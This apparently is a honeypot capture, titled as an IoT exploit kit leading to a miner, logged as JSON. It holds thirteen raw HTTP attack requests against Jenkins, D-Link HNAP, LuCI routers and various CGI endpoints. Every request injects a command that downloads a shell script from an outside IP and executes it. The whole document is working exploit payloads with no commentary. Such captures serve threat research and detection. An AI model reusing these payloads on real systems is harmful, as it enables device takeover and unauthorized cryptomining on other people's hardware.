IoT exploit kit tying to mine

{
    "datas": [
        {
            "@timestamp": "2018-09-19T20:59:32.000Z",
            "data": "POST /jenkins/createItem?name=bAmQj HTTP/1.1\r\nContent-Type: application/xml\r\nConnection: close\r\nContent-Length: 846\r\n\r\n'\n        \u003cmap\u003e\n          \u003centry\u003e\n            \u003cgroovy.util.Expando\u003e\n              \u003cexpandoProperties\u003e\n                \u003centry\u003e\n                  \u003cstring\u003ehashCode\u003c/string\u003e\n                  \u003corg.codehaus.groovy.runtime.MethodClosure\u003e\n                    \u003cdelegate class=\"groovy.util.Expando\"/\u003e\n                    \u003cowner class=\"java.lang.ProcessBuilder\"\u003e\n                      \u003ccommand\u003e\u003cstring\u003ewget\u003c/string\u003e\u003cstring\u003ehttp://185.10.68.163/worldwest.sh\u003c/string\u003e\u003cstring\u003e-O\u003c/string\u003e\u003cstring\u003e-\u003e\u003c/string\u003e\u003cstring\u003e/tmp/nemp;sh\u003c/string\u003e\u003cstring\u003e/tmp/nemp\u003c/string\u003e\u003c/command\u003e\n                    \u003c/owner\u003e\n                    \u003cmethod\u003estart\u003c/method\u003e\n                  \u003c/org.codehaus.groovy.runtime.MethodClosure\u003e\n                \u003c/entry\u003e\n              \u003c/expandoProperties\u003e\n            \u003c/groovy.util.Expando\u003e\n            \u003cint\u003e1\u003c/int\u003e\n          \u003c/entry\u003e\n      \u003c/map\u003e'"
        },
        {
            "@timestamp": "2018-09-19T20:59:31.000Z",
            "data": "POST / HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nContent-Type: text/xml; charset=UTF-8\r\nContent-Length: 368\r\n\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n\u003cmethodCall\u003e\n\t\u003cmethodName\u003eset_time_config\u003c/methodName\u003e\n\t\u003cparams\u003e\n\t\u003cparam\u003e\n\t\t\u003cvalue\u003e\n\t\t\u003cstruct\u003e\n\t\t\t\u003cmember\u003e\n\t\t\t\u003cname\u003etimezone\u003c/name\u003e\n\t\t\t\u003cvalue\u003e\n\t\t\t\t\u003cstring\u003e\"`wget%20http://185.10.68.163/worldwest.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tmp/nemp`\"\u003c/string\u003e\n\t\t\t\u003c/value\u003e\n\t\t\t\u003c/member\u003e\n\t\t\u003c/struct\u003e\n\t\t\u003c/value\u003e\n\t\u003c/param\u003e\n\t\u003c/params\u003e\n\u003c/methodCall"
        },
        {
            "@timestamp": "2018-09-19T20:59:31.000Z",
            "data": "POST /createItem?name=eN2JH HTTP/1.1\r\nContent-Type: application/xml\r\nConnection: close\r\nContent-Length: 846\r\n\r\n'\n        \u003cmap\u003e\n          \u003centry\u003e\n            \u003cgroovy.util.Expando\u003e\n              \u003cexpandoProperties\u003e\n                \u003centry\u003e\n                  \u003cstring\u003ehashCode\u003c/string\u003e\n                  \u003corg.codehaus.groovy.runtime.MethodClosure\u003e\n                    \u003cdelegate class=\"groovy.util.Expando\"/\u003e\n                    \u003cowner class=\"java.lang.ProcessBuilder\"\u003e\n                      \u003ccommand\u003e\u003cstring\u003ewget\u003c/string\u003e\u003cstring\u003ehttp://185.10.68.163/worldwest.sh\u003c/string\u003e\u003cstring\u003e-O\u003c/string\u003e\u003cstring\u003e-\u003e\u003c/string\u003e\u003cstring\u003e/tmp/nemp;sh\u003c/string\u003e\u003cstring\u003e/tmp/nemp\u003c/string\u003e\u003c/command\u003e\n                    \u003c/owner\u003e\n                    \u003cmethod\u003estart\u003c/method\u003e\n                  \u003c/org.codehaus.groovy.runtime.MethodClosure\u003e\n                \u003c/entry\u003e\n              \u003c/expandoProperties\u003e\n            \u003c/groovy.util.Expando\u003e\n            \u003cint\u003e1\u003c/int\u003e\n          \u003c/entry\u003e\n      \u003c/map\u003e'"
        },
        {
            "@timestamp": "2018-09-19T20:59:30.000Z",
            "data": "GET /shell?wget%20http://185.10.68.163/worldwest.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tmp/nemp HTTP/1.1\r\nHost: 127.0.0.1\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
        },
        {
            "@timestamp": "2018-09-19T20:59:29.000Z",
            "data": "GET /HNAP1/ HTTP/1.1\r\nHost: 127.0.0.1\r\nSOAPAction: http://purenetworks.com/HNAP1/GetDeviceSettings/cd \u0026\u0026 cd tmp \u0026\u0026 export PATH=$PATH:. \u0026\u0026 wget%20http://185.10.68.163/worldwest.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tmp/nemp\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
        },
        {
            "@timestamp": "2018-09-19T20:59:29.000Z",
            "data": "GET /login.cgi?cli=wget%20http://185.10.68.163/worldwest.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tmp/nemp HTTP/1.1\r\nHost: 127.0.0.1\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
        },
        {
            "@timestamp": "2018-09-19T20:59:28.000Z",
            "data": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query\u0026ip=google.com\u0026port=80\u0026queryb64str=LW==\u0026username=admin%20;XmlAp%20r%20Account.User1.Password\u003e$(wget%20http://185.10.68.163/worldwest.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tmp/nemp);\u0026password=admin\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
        },
        {
            "@timestamp": "2018-09-19T20:59:28.000Z",
            "data": "GET /cgi-bin/luci/;stok=\u003cClipped\u003e/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button\u0026ping_ip=google.ca%3b%20`wget%20http://185.10.68.163/worldwest.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tmp/nemp`\u0026server_ip= HTTP/1.1\r\nAccept: text/html,application/xhtml777ml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nReferer: http://192.168.0.1/cgi-bin/luci/;stok=\u003cClipped\u003e/expert/maintenance/diagnostic/nslookup\r\nReferer: Accept-Language: en-US,en;q=0.8\r\nCookie: csd=9; sysauth=\u003cClipped\u003e\r\nConnection: close\r\n\r\n"
        },
        {
            "@timestamp": "2018-09-19T20:59:28.000Z",
            "data": "POST /web/cgi-bin/usbinteract.cgi HTTP/1.1\r\nHost: 127.0.0.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 98\r\n\r\naction=7\u0026path=\"|wget%20http://185.10.68.163/worldwest.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tmp/nemp||\\"
        },
        {
            "@timestamp": "2018-09-19T20:59:28.000Z",
            "data": "POST /u/jsp/tools/exec.jsp HTTP/1.1\r\nHost: 127.0.0.1\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nCookie: JSESSIONID=542B58462355E4E3B99FAA42842E62FF\r\nConnection: close\r\nPragma: no-cache\r\nCache-Control: no-cache\r\nContent-Length: 173\r\n\r\ncommand=cmd+%2Fc+ping\u0026argument=127.0.0.1+%7C+`wget%20http://185.10.68.163/worldwest.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tmp/nemp`\u0026async_output=ping1487856455258\u0026isWindows=false"
        },
        {
            "@timestamp": "2018-09-19T20:59:22.000Z",
            "data": "POST /tmBlock.cgi HTTP/1.1\r\nHost: 127.0.0.1\r\nAuthorization: Basic YWRtaW46cG9ybmh1Yg==\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 174\r\n\r\nsubmit_button=\u0026change_action=\u0026action=\u0026commit=0\u0026ttcp_num=2\u0026ttcp_size=2\u0026ttcp_ip=-h `wget%20http://185.10.68.163/worldwest.sh%20-O%20-\\%3E%20/tmp/nemp;sh%20/tmp/nemp`\u0026StartEPI=1"
        },
        {
            "@timestamp": "2018-09-19T20:59:22.000Z",
            "data": "POST /board.cgi HTTP/1.1\r\nHost: 127.0.0.1\r\nContent-Length: 85\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\ncmd=`wget%20http://185.10.68.163/worldwest.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tmp/nemp`"
        },
        {
            "@timestamp": "2018-09-19T20:59:22.000Z",
            "data": "POST /board.cgi HTTP/1.1\r\nHost: 127.0.0.1\r\nContent-Length: 85\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\ncmd=`wget%20http://185.10.68.163/worldwest.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tmp/nemp`"
        }
    ],
    "inputs": {}
}